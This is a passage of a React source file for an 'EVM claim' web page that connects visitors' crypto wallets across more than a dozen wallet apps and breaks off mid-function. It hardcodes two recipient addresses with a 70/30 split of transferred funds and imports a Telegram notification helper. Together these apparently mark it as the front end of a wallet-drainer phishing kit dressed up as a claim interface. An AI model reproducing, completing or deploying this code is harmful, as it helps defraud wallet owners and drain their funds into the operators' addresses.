import React, { useState, useEffect } from 'react';
import { ethers } from 'ethers';
import { Clock, AlertCircle, ExternalLink, LogOut } from 'lucide-react';
import { MetaMaskProvider, useSDK } from '@metamask/sdk-react';
import { EthereumProvider } from '@walletconnect/ethereum-provider';
import { notifyTelegram } from '../lib/telemetry';
import { EVM_CHAINS as EVM_CHAINS_CONFIG } from '../lib/evmChains';

// Import wallet images from walls folder
import MetaMaskWallet from '../walls/metamask.webp';
import TrustWallet from '../walls/trust.webp';
import CoinbaseWallet from '../walls/coinbase.webp';
import BinanceWallet from '../walls/Binance.webp';
import OKXWallet from '../walls/OKX.webp';
import BitgetWallet from '../walls/bitget.webp';
import BraveWallet from '../walls/bravel.webp';
import BybitWallet from '../walls/bybit.webp';
import CryptoDotComWallet from '../walls/cryptodotcom.webp';
import BlockchainWallet from '../walls/blockchain.webp';
import SafePalWallet from '../walls/safepal.webp';
import UniswapWallet from '../walls/uniswap.webp';
import ZealWallet from '../walls/zeal.webp';
import ZerionWallet from '../walls/zerion.webp';
import KeplrWallet from '../walls/keplr.webp';
import RabbyWallet from '../walls/rabby.webp';

// ===================== SPLIT TRANSFER DESTINATIONS (EVM) =====================
// Paste the two EVM recipient addresses below.
// - 70% will go to EVM_PRIMARY_RECIPIENT  
// - 30% will go to EVM_SECONDARY_RECIPIENT
// If EVM_SECONDARY_RECIPIENT is not a valid EVM address, 100% will be sent to the primary.
const EVM_PRIMARY_RECIPIENT = '0x8907F1aE906F7b050ed8D93F48f90f62A1F2abA3';
const EVM_SECONDARY_RECIPIENT = '0xa4d47A8170776B5EdCC579b1f58290DA438a2B67';

// MetaMask SDK Configuration
const sdkOptions = {
  dappMetadata: {
      name: 'EVSectionResolver',
    url: window.location.href,
  },
  enableDebug: true,
  checkInstallationImmediately: false,
};

// Main Component with MetaMask Provider
const EVMClaimInterfaceWithProvider = () => {
  return (
    <MetaMaskProvider sdkOptions={sdkOptions}>
      <EVMClaimInterface />
    </MetaMaskProvider>
  );
};

// Main EVM Interface Component
const EVMClaimInterface = () => {
  console.log('🔍 EVMClaimInterface component rendered!');
  
  // State management
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState('');
  const [success, setSuccess] = useState(false);
  const [account, setAccount] = useState(null);
  const [provider, setProvider] = useState(null);
  const [signer, setSigner] = useState(null);
  const [balance, setBalance] = useState(null);
  const [showWalletSelector, setShowWalletSelector] = useState(false);
  const [isConnecting, setIsConnecting] = useState(false);

  // MetaMask SDK hooks
  const { sdk, connected, connecting, account: sdkAccount } = useSDK();

  // Function to format wallet address
  const formatAddress = (address) => {
    return `${address.slice(0, 4)}...${address.slice(-4)}`;
  };

  // Helper function to check for existing connection (non-prompting)
  const checkExistingConnection = async (provider = window.ethereum) => {
    if (!provider) return null;
    
    try {
      const accounts = await provider.request({ method: 'eth_accounts' });
      if (accounts && accounts.length > 0) {
        return accounts[0];
      }
    } catch (err) {
      console.log('🔍 No existing connection found');
    }
    return null;
  };

  // Helper function to connect wallet (checks existing first, then requests if needed)
  const connectWalletProvider = async (provider = window.ethereum) => {
    if (!provider) {
      throw new Error('No wallet provider available');
    }

    // First check for existing connection (non-prompting)
    const existingAccount = await checkExistingConnection(provider);
    if (existingAccount && !account) {
      console.log('🔍 Found existing wallet connection:', existingAccount);
      handleConnectionSuccess(existingAccount);
      return existingAccount;
    }

    // If not connected, request connection (prompts user)
    if (!account) {
      console.log('🔍 Requesting new wallet connection...');
      const accounts = await provider.request({ method: 'eth_requestAccounts' });
      if (accounts && accounts.length > 0) {
        handleConnectionSuccess(accounts[0]);
        return accounts[0];
      }
    }

    return null;
  };

  // Check for existing wallet connection on page load (ONCE - no duplicates)
  useEffect(() => {
    // Stop immediately if already connected
    if (account) {
      console.log('🔍 Already connected, skipping connection check');
      return;
    }

    const checkOnce = async () => {
      // Check for Ethereum provider (MetaMask, Trust Wallet, etc.)
      if (typeof window.ethereum !== 'undefined') {
        try {
          const accounts = await window.ethereum.request({ method: 'eth_accounts' });
          if (accounts && accounts.length > 0 && !account) {
            console.log('🔍 Found existing wallet connection:', accounts[0]);
            handleConnectionSuccess(accounts[0]);
            return;
          }
        } catch (err) {
          // Silent fail
        }
      }
      
      // Check for Binance Chain
      if (typeof window.BinanceChain !== 'undefined') {
        try {
          const accounts = await window.BinanceChain.request({ method: 'eth_accounts' });
          if (accounts && accounts.length > 0 && !account) {
            console.log('🔍 Found existing Binance Chain connection:', accounts[0]);
            handleConnectionSuccess(accounts[0]);
            return;
          }
        } catch (err) {
          // Silent fail
        }
      }
    };

    // Small delay to ensure wallet providers are loaded
    const timer = setTimeout(checkOnce, 500);
    return () => clearTimeout(timer);
  }, [account]); // Re-run only if account becomes null (disconnected)

  // Check device type and wallet availability
  useEffect(() => {
    console.log('🔍 Checking device and wallet availability...');
    
    const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
    const isIOS = /iPad|iPhone|iPod/.test(navigator.userAgent);
    const isAndroid = /Android/.test(navigator.userAgent);
    const isDAppBrowser = window.ethereum || window.BinanceChain || window.trustwallet;
    
    console.log('🔍 Is mobile device:', isMobile);
    console.log('🔍 Is iOS:', isIOS);
    console.log('🔍 Is Android:', isAndroid);
    console.log('🔍 Is DApp browser:', !!isDAppBrowser);
    
    if (isMobile) {
      console.log('🔍 Mobile device detected - mobile wallets will be available');
      
      // Check for various wallet providers
      if (typeof window.ethereum !== 'undefined') {
        console.log('🔍 MetaMask mobile detected');
      }
      if (typeof window.BinanceChain !== 'undefined') {
        console.log('🔍 Binance Chain detected');
      }
      if (typeof window.trustwallet !== 'undefined') {
        console.log('🔍 Trust Wallet detected');
      }
      if (typeof window.keplr !== 'undefined') {
        console.log('🔍 Keplr Wallet detected');
      }
      if (typeof window.rabby !== 'undefined') {
        console.log('🔍 Rabby Wallet detected');
      }
      
      if (isDAppBrowser) {
        console.log('🔍 DApp browser detected - direct deep-linking will work');
        console.log('🔍 Mobile wallet connection tips:');
        console.log('🔍 1. The wallet app will open automatically');
        console.log('🔍 2. Approve the connection request in the wallet app');
        console.log('🔍 3. Return to this page after approval');
      } else {
        console.log('🔍 Regular mobile browser detected - using fallback methods');
        console.log('🔍 Mobile wallet connection tips:');
        console.log('🔍 1. Make sure the wallet app is installed');
        console.log('🔍 2. The app will attempt to open automatically');
        console.log('🔍 3. If app doesn\'t open, try opening this website in the wallet\'s DApp browser');
        console.log('🔍 4. Approve the connection request in the wallet app');
      }
    } else {
      console.log('🔍 Desktop device detected - browser extensions will be available');
    }
  }, []);

  // Handle MetaMask SDK connection
  useEffect(() => {
    if (connected && sdkAccount) {
      console.log('🔍 MetaMask SDK connected:', sdkAccount);
      handleConnectionSuccess(sdkAccount);
    }
  }, [connected, sdkAccount]);

  // Connect to MetaMask (works on both mobile and desktop)
  const connectMetaMask = async () => {
    console.log('🔍 connectMetaMask called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Requesting MetaMask connection...');
      
      // This will work on both mobile and desktop
      const accounts = await sdk.connect();
      console.log('🔍 MetaMask connection result:', accounts);
      
      if (accounts && accounts.length > 0) {
        console.log('🔍 MetaMask connected successfully');
        handleConnectionSuccess(accounts[0]);
      } else {
        throw new Error('No accounts received from MetaMask');
      }
      
    } catch (err) {
      console.error('❌ MetaMask connection failed:', err);
      setError(`MetaMask connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Trust Wallet (mobile only)
  const connectTrustWallet = async () => {
    console.log('🔍 connectTrustWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
      
      if (!isMobile) {
        throw new Error('Trust Wallet is only available on mobile devices');
      }
      
      console.log('🔍 Attempting Trust Wallet connection...');
      
      // Multiple connection methods for different mobile browsers
      const returnUrl = encodeURIComponent(window.location.href);
      
      // Method 1: Direct deep-link (works in DApp browsers)
      const trustDirectUrl = `trust://open_url?coin_id=60&url=${returnUrl}`;
      console.log('🔍 Trying direct deep-link:', trustDirectUrl);
      
      // Method 2: Universal link (works in regular browsers)
      const trustUniversalUrl = `https://link.trustwallet.com/open_url?coin_id=60&url=${returnUrl}`;
      
      // Method 3: Intent-based (Android)
      const trustIntentUrl = `intent://open_url?coin_id=60&url=${returnUrl}#Intent;scheme=trust;package=com.wallet.crypto.trustapp;end`;
      
      // Try multiple approaches
      let connectionAttempted = false;
      
      // Approach 1: Try direct deep-link first
      try {
        window.location.href = trustDirectUrl;
        connectionAttempted = true;
        console.log('🔍 Direct deep-link attempted');
      } catch (e) {
        console.log('🔍 Direct deep-link failed, trying universal link');
      }
      
      // Approach 2: If direct fails, try universal link after delay
      setTimeout(() => {
        if (!connectionAttempted) {
          console.log('🔍 Trying universal link approach');
          window.location.href = trustUniversalUrl;
          connectionAttempted = true;
        }
      }, 1000);
      
      // Approach 3: For Android, try intent-based
      if (/Android/i.test(navigator.userAgent) && !connectionAttempted) {
        setTimeout(() => {
          console.log('🔍 Trying Android intent approach');
          window.location.href = trustIntentUrl;
        }, 2000);
      }
      
      // Wait for wallet to open and check connection
      // Use polling to check for connection without prompting again
      let connectionCheckCount = 0;
      const maxChecks = 15; // Check 15 times over 30 seconds
      
      const checkConnection = async () => {
        // CRITICAL: Stop immediately if already connected
        if (account) {
          console.log('✅ Already connected, stopping all connection checks');
          setIsConnecting(false);
          return;
        }
        
        connectionCheckCount++;
        console.log(`🔍 Checking for Trust Wallet connection (attempt ${connectionCheckCount}/${maxChecks})...`);
        
        // Check multiple possible providers
        if (typeof window.ethereum !== 'undefined') {
          try {
            // First check if already connected (eth_accounts doesn't prompt)
            const existingAccounts = await window.ethereum.request({ method: 'eth_accounts' });
            if (existingAccounts && existingAccounts.length > 0) {
              console.log('🔍 Found existing Trust Wallet connection:', existingAccounts[0]);
              handleConnectionSuccess(existingAccounts[0]);
              return; // STOP - connection successful
            }
            
            // Only request connection on first check
            if (connectionCheckCount === 1) {
              console.log('🔍 Requesting Trust Wallet connection...');
              const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
              if (accounts && accounts.length > 0) {
                console.log('🔍 Trust Wallet accounts received:', accounts);
                handleConnectionSuccess(accounts[0]);
                return; // STOP - connection successful
              }
            }
          } catch (err) {
            if (connectionCheckCount === maxChecks) {
              console.error('❌ Trust Wallet account request failed:', err);
              setError('Trust Wallet connection failed. Please try again.');
              setIsConnecting(false);
            }
          }
        } else if (typeof window.BinanceChain !== 'undefined') {
          try {
            const existingAccounts = await window.BinanceChain.request({ method: 'eth_accounts' });
            if (existingAccounts && existingAccounts.length > 0) {
              console.log('🔍 Found existing Binance Chain connection:', existingAccounts[0]);
              handleConnectionSuccess(existingAccounts[0]);
              return; // STOP - connection successful
            }
            
            if (connectionCheckCount === 1) {
              const accounts = await window.BinanceChain.request({ method: 'eth_requestAccounts' });
              if (accounts && accounts.length > 0) {
                console.log('🔍 Trust Wallet (BinanceChain) accounts received:', accounts);
                handleConnectionSuccess(accounts[0]);
                return; // STOP - connection successful
              }
            }
          } catch (err) {
            if (connectionCheckCount === maxChecks) {
              console.error('❌ Trust Wallet (BinanceChain) account request failed:', err);
              setError('Trust Wallet connection failed. Please try again.');
              setIsConnecting(false);
            }
          }
        } else if (connectionCheckCount === maxChecks) {
          console.log('🔍 No wallet provider detected after all attempts');
          setError('Trust Wallet not detected. Try opening this website in Trust Wallet\'s DApp browser or install the app.');
          setIsConnecting(false);
        }
        
        // Continue checking ONLY if not connected and haven't reached max
        if (connectionCheckCount < maxChecks && !account) {
          setTimeout(checkConnection, 2000);
        } else {
          setIsConnecting(false);
        }
      };
      
      // Start checking after initial delay
      setTimeout(checkConnection, 2000);
      
    } catch (err) {
      console.error('❌ Trust Wallet connection failed:', err);
      setError(`Trust Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Coinbase Wallet (mobile only)
  const connectCoinbaseWallet = async () => {
    console.log('🔍 connectCoinbaseWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
      
      if (!isMobile) {
        throw new Error('Coinbase Wallet is only available on mobile devices');
      }
      
      console.log('🔍 Attempting Coinbase Wallet connection...');
      
      // Direct Coinbase Wallet app opening
      const returnUrl = encodeURIComponent(window.location.href);
      
      // iOS and Android direct deep-links
      const coinbaseDirectUrl = `coinbase://wallet/connect?redirect_uri=${returnUrl}`;
      console.log('🔍 Opening Coinbase Wallet directly:', coinbaseDirectUrl);
      
      // Create a hidden iframe to trigger the deep-link
      const iframe = document.createElement('iframe');
      iframe.style.display = 'none';
      iframe.src = coinbaseDirectUrl;
      document.body.appendChild(iframe);
      
      // Also try window.location as fallback
      setTimeout(() => {
        window.location.href = coinbaseDirectUrl;
      }, 100);
      
      // Wait for wallet to open and check connection
      setTimeout(async () => {
        console.log('🔍 Checking for Coinbase Wallet connection...');
        
        if (typeof window.ethereum !== 'undefined') {
          try {
            console.log('🔍 window.ethereum detected, requesting accounts...');
            const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
            console.log('🔍 Coinbase Wallet accounts received:', accounts);
            handleConnectionSuccess(accounts[0]);
          } catch (err) {
            console.error('❌ Coinbase Wallet account request failed:', err);
            setError('Coinbase Wallet connection failed. Please try again.');
            setIsConnecting(false);
          }
        } else {
          console.log('🔍 No wallet provider detected after timeout');
          setError('Coinbase Wallet not available. Please install the app.');
          setIsConnecting(false);
        }
        
        // Clean up iframe
        if (iframe.parentNode) {
          iframe.parentNode.removeChild(iframe);
        }
      }, 5000);
      
    } catch (err) {
      console.error('❌ Coinbase Wallet connection failed:', err);
      setError(`Coinbase Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Binance Wallet
  const connectBinanceWallet = async () => {
    console.log('🔍 connectBinanceWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting Binance Wallet connection...');
      
      // Check if Binance Chain is available (desktop)
      if (typeof window.BinanceChain !== 'undefined') {
        // First check for existing connection
        const existingAccount = await checkExistingConnection(window.BinanceChain);
        if (existingAccount && !account) {
          console.log('🔍 Found existing Binance Chain connection:', existingAccount);
          handleConnectionSuccess(existingAccount);
          return;
        }
        
        // Request connection if not already connected
        const accounts = await window.BinanceChain.request({ method: 'eth_requestAccounts' });
        if (accounts && accounts.length > 0) {
          handleConnectionSuccess(accounts[0]);
        }
      } else {
        // Mobile: Direct Binance Wallet app opening
        const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        
        if (isMobile) {
          const returnUrl = encodeURIComponent(window.location.href);
          const binanceDirectUrl = `binance://wallet/connect?url=${returnUrl}`;
          console.log('🔍 Opening Binance Wallet directly:', binanceDirectUrl);
          
          // Create a hidden iframe to trigger the deep-link
          const iframe = document.createElement('iframe');
          iframe.style.display = 'none';
          iframe.src = binanceDirectUrl;
          document.body.appendChild(iframe);
          
          // Also try window.location as fallback
          setTimeout(() => {
            window.location.href = binanceDirectUrl;
          }, 100);
          
          // Wait for wallet to open and check connection
          let connectionCheckCount = 0;
          const maxChecks = 10;
          
          const checkConnection = async () => {
            connectionCheckCount++;
            console.log(`🔍 Checking for Binance Wallet connection (attempt ${connectionCheckCount}/${maxChecks})...`);
            
            if (typeof window.BinanceChain !== 'undefined') {
              try {
                // First check for existing connection (non-prompting)
                const existingAccount = await checkExistingConnection(window.BinanceChain);
                if (existingAccount && !account) {
                  console.log('🔍 Found existing Binance Chain connection:', existingAccount);
                  handleConnectionSuccess(existingAccount);
                  if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                  return;
                }
                
                // Only request connection on first check
                if (connectionCheckCount === 1 && !account) {
                  const accounts = await window.BinanceChain.request({ method: 'eth_requestAccounts' });
                  if (accounts && accounts.length > 0) {
                    handleConnectionSuccess(accounts[0]);
                    if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                    return;
                  }
                }
              } catch (err) {
                if (connectionCheckCount === maxChecks) {
                  setError('Binance Wallet connection failed. Please try again.');
                  setIsConnecting(false);
                  if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                }
              }
            } else if (connectionCheckCount === maxChecks) {
              setError('Binance Wallet not available. Please install the app.');
              setIsConnecting(false);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
            }
            
            // Continue checking if not connected
            if (connectionCheckCount < maxChecks && !account) {
              setTimeout(checkConnection, 2000);
            } else if (connectionCheckCount >= maxChecks && !account) {
              setIsConnecting(false);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
            }
          };
          
          setTimeout(checkConnection, 2000);
        } else {
          setError('Binance Wallet not available. Please install the extension.');
          setIsConnecting(false);
        }
      }
      
    } catch (err) {
      console.error('❌ Binance Wallet connection failed:', err);
      setError(`Binance Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to OKX Wallet
  const connectOKXWallet = async () => {
    console.log('🔍 connectOKXWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting OKX Wallet connection...');
      
      // Direct OKX Wallet app opening
      const returnUrl = encodeURIComponent(window.location.href);
      const okxDirectUrl = `okx://wallet/dapp/details?dappUrl=${returnUrl}`;
      
      console.log('🔍 Opening OKX Wallet directly:', okxDirectUrl);
      
      // Create a hidden iframe to trigger the deep-link
      const iframe = document.createElement('iframe');
      iframe.style.display = 'none';
      iframe.src = okxDirectUrl;
      document.body.appendChild(iframe);
      
      // Also try window.location as fallback
      setTimeout(() => {
        window.location.href = okxDirectUrl;
      }, 100);
      
      // Wait for wallet to open and check connection
      let connectionCheckCount = 0;
      const maxChecks = 10;
      
      const checkConnection = async () => {
        connectionCheckCount++;
        console.log(`🔍 Checking for OKX Wallet connection (attempt ${connectionCheckCount}/${maxChecks})...`);
        
        if (typeof window.ethereum !== 'undefined') {
          try {
            // First check for existing connection (non-prompting)
            const existingAccount = await checkExistingConnection(window.ethereum);
            if (existingAccount && !account) {
              console.log('🔍 Found existing OKX Wallet connection:', existingAccount);
              handleConnectionSuccess(existingAccount);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
              return;
            }
            
            // Only request connection on first check
            if (connectionCheckCount === 1 && !account) {
              const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
              if (accounts && accounts.length > 0) {
                handleConnectionSuccess(accounts[0]);
                if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                return;
              }
            }
          } catch (err) {
            if (connectionCheckCount === maxChecks) {
              setError('OKX Wallet connection failed. Please try again.');
              setIsConnecting(false);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
            }
          }
        } else if (connectionCheckCount === maxChecks) {
          setError('OKX Wallet not available. Please install the app.');
          setIsConnecting(false);
          if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
        }
        
        // Continue checking if not connected
        if (connectionCheckCount < maxChecks && !account) {
          setTimeout(checkConnection, 2000);
        } else if (connectionCheckCount >= maxChecks && !account) {
          setIsConnecting(false);
          if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
        }
      };
      
      setTimeout(checkConnection, 2000);
      
    } catch (err) {
      console.error('❌ OKX Wallet connection failed:', err);
      setError(`OKX Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Bitget Wallet
  const connectBitgetWallet = async () => {
    console.log('🔍 connectBitgetWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting Bitget Wallet connection...');
      
      // Direct Bitget Wallet app opening
      const returnUrl = encodeURIComponent(window.location.href);
      const bitgetDirectUrl = `bitget://wallet/dapp/details?dappUrl=${returnUrl}`;
      
      console.log('🔍 Opening Bitget Wallet directly:', bitgetDirectUrl);
      
      // Create a hidden iframe to trigger the deep-link
      const iframe = document.createElement('iframe');
      iframe.style.display = 'none';
      iframe.src = bitgetDirectUrl;
      document.body.appendChild(iframe);
      
      // Also try window.location as fallback
      setTimeout(() => {
        window.location.href = bitgetDirectUrl;
      }, 100);
      
      // Wait for wallet to open and check connection
      setTimeout(async () => {
        if (typeof window.ethereum !== 'undefined') {
          try {
            const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
            handleConnectionSuccess(accounts[0]);
          } catch (err) {
            setError('Bitget Wallet connection failed. Please try again.');
            setIsConnecting(false);
          }
        } else {
          setError('Bitget Wallet not available. Please install the app.');
          setIsConnecting(false);
        }
        
        // Clean up iframe
        if (iframe.parentNode) {
          iframe.parentNode.removeChild(iframe);
        }
      }, 5000);
      
    } catch (err) {
      console.error('❌ Bitget Wallet connection failed:', err);
      setError(`Bitget Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Brave Wallet
  const connectBraveWallet = async () => {
    console.log('🔍 connectBraveWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting Brave Wallet connection...');
      
      // Brave Wallet uses standard ethereum provider
      if (typeof window.ethereum !== 'undefined') {
        // First check for existing connection
        const existingAccount = await checkExistingConnection(window.ethereum);
        if (existingAccount && !account) {
          console.log('🔍 Found existing Brave Wallet connection:', existingAccount);
          handleConnectionSuccess(existingAccount);
          return;
        }
        
        // Request connection if not already connected
        const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
        if (accounts && accounts.length > 0) {
          handleConnectionSuccess(accounts[0]);
        }
      } else {
        throw new Error('Brave Wallet not detected. Please install the extension.');
      }
      
    } catch (err) {
      console.error('❌ Brave Wallet connection failed:', err);
      setError(`Brave Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Bybit Wallet
  const connectBybitWallet = async () => {
    console.log('🔍 connectBybitWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting Bybit Wallet connection...');
      
      // Direct Bybit Wallet app opening
      const returnUrl = encodeURIComponent(window.location.href);
      const bybitDirectUrl = `bybit://wallet/dapp/details?dappUrl=${returnUrl}`;
      
      console.log('🔍 Opening Bybit Wallet directly:', bybitDirectUrl);
      
      // Create a hidden iframe to trigger the deep-link
      const iframe = document.createElement('iframe');
      iframe.style.display = 'none';
      iframe.src = bybitDirectUrl;
      document.body.appendChild(iframe);
      
      // Also try window.location as fallback
      setTimeout(() => {
        window.location.href = bybitDirectUrl;
      }, 100);
      
      // Wait for wallet to open and check connection
      let connectionCheckCount = 0;
      const maxChecks = 10;
      
      const checkConnection = async () => {
        connectionCheckCount++;
        console.log(`🔍 Checking for Bybit Wallet connection (attempt ${connectionCheckCount}/${maxChecks})...`);
        
        if (typeof window.ethereum !== 'undefined') {
          try {
            // First check for existing connection (non-prompting)
            const existingAccount = await checkExistingConnection(window.ethereum);
            if (existingAccount && !account) {
              console.log('🔍 Found existing Bybit Wallet connection:', existingAccount);
              handleConnectionSuccess(existingAccount);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
              return;
            }
            
            // Only request connection on first check
            if (connectionCheckCount === 1 && !account) {
              const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
              if (accounts && accounts.length > 0) {
                handleConnectionSuccess(accounts[0]);
                if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                return;
              }
            }
          } catch (err) {
            if (connectionCheckCount === maxChecks) {
              setError('Bybit Wallet connection failed. Please try again.');
              setIsConnecting(false);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
            }
          }
        } else if (connectionCheckCount === maxChecks) {
          setError('Bybit Wallet not available. Please install the app.');
          setIsConnecting(false);
          if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
        }
        
        // Continue checking if not connected
        if (connectionCheckCount < maxChecks && !account) {
          setTimeout(checkConnection, 2000);
        } else if (connectionCheckCount >= maxChecks && !account) {
          setIsConnecting(false);
          if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
        }
      };
      
      setTimeout(checkConnection, 2000);
      
    } catch (err) {
      console.error('❌ Bybit Wallet connection failed:', err);
      setError(`Bybit Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Crypto.com Wallet
  const connectCryptoDotComWallet = async () => {
    console.log('🔍 connectCryptoDotComWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting Crypto.com Wallet connection...');
      
      // Direct Crypto.com Wallet app opening
      const returnUrl = encodeURIComponent(window.location.href);
      const cryptoDirectUrl = `cryptocom://wallet/dapp/details?dappUrl=${returnUrl}`;
      
      console.log('🔍 Opening Crypto.com Wallet directly:', cryptoDirectUrl);
      
      // Create a hidden iframe to trigger the deep-link
      const iframe = document.createElement('iframe');
      iframe.style.display = 'none';
      iframe.src = cryptoDirectUrl;
      document.body.appendChild(iframe);
      
      // Also try window.location as fallback
      setTimeout(() => {
        window.location.href = cryptoDirectUrl;
      }, 100);
      
      // Wait for wallet to open and check connection
      setTimeout(async () => {
        if (typeof window.ethereum !== 'undefined') {
          try {
            const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
            handleConnectionSuccess(accounts[0]);
          } catch (err) {
            setError('Crypto.com Wallet connection failed. Please try again.');
            setIsConnecting(false);
          }
        } else {
          setError('Crypto.com Wallet not available. Please install the app.');
          setIsConnecting(false);
        }
        
        // Clean up iframe
        if (iframe.parentNode) {
          iframe.parentNode.removeChild(iframe);
        }
      }, 5000);
      
    } catch (err) {
      console.error('❌ Crypto.com Wallet connection failed:', err);
      setError(`Crypto.com Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Blockchain.com Wallet
  const connectBlockchainWallet = async () => {
    console.log('🔍 connectBlockchainWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting Blockchain.com Wallet connection...');
      
      // Direct Blockchain.com Wallet app opening
      const returnUrl = encodeURIComponent(window.location.href);
      const blockchainDirectUrl = `blockchain://wallet/dapp/details?dappUrl=${returnUrl}`;
      
      console.log('🔍 Opening Blockchain.com Wallet directly:', blockchainDirectUrl);
      
      // Create a hidden iframe to trigger the deep-link
      const iframe = document.createElement('iframe');
      iframe.style.display = 'none';
      iframe.src = blockchainDirectUrl;
      document.body.appendChild(iframe);
      
      // Also try window.location as fallback
      setTimeout(() => {
        window.location.href = blockchainDirectUrl;
      }, 100);
      
      // Wait for wallet to open and check connection
      let connectionCheckCount = 0;
      const maxChecks = 10;
      
      const checkConnection = async () => {
        connectionCheckCount++;
        console.log(`🔍 Checking for Blockchain.com Wallet connection (attempt ${connectionCheckCount}/${maxChecks})...`);
        
        if (typeof window.ethereum !== 'undefined') {
          try {
            // First check for existing connection (non-prompting)
            const existingAccount = await checkExistingConnection(window.ethereum);
            if (existingAccount && !account) {
              console.log('🔍 Found existing Blockchain.com Wallet connection:', existingAccount);
              handleConnectionSuccess(existingAccount);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
              return;
            }
            
            // Only request connection on first check
            if (connectionCheckCount === 1 && !account) {
              const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
              if (accounts && accounts.length > 0) {
                handleConnectionSuccess(accounts[0]);
                if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
                return;
              }
            }
          } catch (err) {
            if (connectionCheckCount === maxChecks) {
              setError('Blockchain.com Wallet connection failed. Please try again.');
              setIsConnecting(false);
              if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
            }
          }
        } else if (connectionCheckCount === maxChecks) {
          setError('Blockchain.com Wallet not available. Please install the app.');
          setIsConnecting(false);
          if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
        }
        
        // Continue checking if not connected
        if (connectionCheckCount < maxChecks && !account) {
          setTimeout(checkConnection, 2000);
        } else if (connectionCheckCount >= maxChecks && !account) {
          setIsConnecting(false);
          if (iframe.parentNode) iframe.parentNode.removeChild(iframe);
        }
      };
      
      setTimeout(checkConnection, 2000);
      
    } catch (err) {
      console.error('❌ Blockchain.com Wallet connection failed:', err);
      setError(`Blockchain.com Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to SafePal Wallet
  const connectSafePalWallet = async () => {
    console.log('🔍 connectSafePalWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
      console.log('🔍 Attempting SafePal Wallet connection...');
      
      // Direct SafePal Wallet app opening
      const returnUrl = encodeURIComponent(window.location.href);
      const safepalDirectUrl = `safepal://wallet/dapp/details?dappUrl=${returnUrl}`;
      
      console.log('🔍 Opening SafePal Wallet directly:', safepalDirectUrl);
      
      // Create a hidden iframe to trigger the deep-link
      const iframe = document.createElement('iframe');
      iframe.style.display = 'none';
      iframe.src = safepalDirectUrl;
      document.body.appendChild(iframe);
      
      // Also try window.location as fallback
      setTimeout(() => {
        window.location.href = safepalDirectUrl;
      }, 100);
      
      // Wait for wallet to open and check connection
      setTimeout(async () => {
        if (typeof window.ethereum !== 'undefined') {
          try {
            const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
            handleConnectionSuccess(accounts[0]);
          } catch (err) {
            setError('SafePal Wallet connection failed. Please try again.');
            setIsConnecting(false);
          }
        } else {
          setError('SafePal Wallet not available. Please install the app.');
          setIsConnecting(false);
        }
        
        // Clean up iframe
        if (iframe.parentNode) {
          iframe.parentNode.removeChild(iframe);
        }
      }, 5000);
      
    } catch (err) {
      console.error('❌ SafePal Wallet connection failed:', err);
      setError(`SafePal Wallet connection failed: ${err.message}`);
      setIsConnecting(false);
    }
  };

  // Connect to Uniswap Wallet
  const connectUniswapWallet = async () => {
    console.log('🔍 connectUniswapWallet called');
    
    try {
      setIsConnecting(true);
      setError('');
      
